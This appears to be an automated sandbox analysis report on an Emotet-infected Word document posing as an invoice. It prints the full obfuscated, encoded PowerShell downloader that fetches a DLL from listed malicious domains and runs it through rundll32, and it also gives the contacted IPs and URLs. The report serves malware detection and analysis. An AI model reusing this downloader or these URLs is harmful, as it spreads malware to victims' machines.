wBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000007.00000002.2108297042.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2176998214.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2163049071.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2163022289.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2207154366.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194263784.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2127194669.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165761420.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2203773462.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2343620375.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2214139159.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117125447.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2152468849.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2343633692.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2345772809.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2104940723.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2203786691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2219092978.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2172234783.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2129920680.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151842869.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2183013093.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2139440408.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2118447591.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193360956.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2138274232.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2138258236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2104991832.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2127180650.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2186208381.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193376705.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117147382.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2213889778.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2183027063.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151824711.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2172223948.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.380000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 343627 Sample: Invoice 6682363.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 16 other signatures 2->57 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 23 2->17         started        process3 signatures4 65 Suspicious powershell command line found 14->65 67 Very long command line found 14->67 69 Encrypted powershell cmdline option found 14->69 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 micronews.eu 93.119.104.27, 49167, 49168, 80 VIRTONO-NETWORKSRO Romania 19->47 49 ofert-al.com 19->49 45 C:\Users\user45dczqyb\Haf0_yn\P44G.dll, PE32 19->45 dropped 61 Powershell drops PE file 19->61 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->71 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->59 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->63 43 rundll32.exe 40->43         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
190.55.186.229
 unknown Argentina
27747 TelecentroSAAR true
93.119.104.27
 unknown Romania
203523 VIRTONO-NETWORKSRO true

Contacted Domains

Name IP Active
ofert-al.com 93.119.104.27 true
micronews.eu 93.119.104.27 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://micronews.eu/crankshaft-pulley-i5aio/Tlp/ true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/ true
  • Avira URL Cloud: safe
 unknown
http://ofert-al.com/wp-content/t9hVViBde/ true
  • Avira URL Cloud: malware
 unknown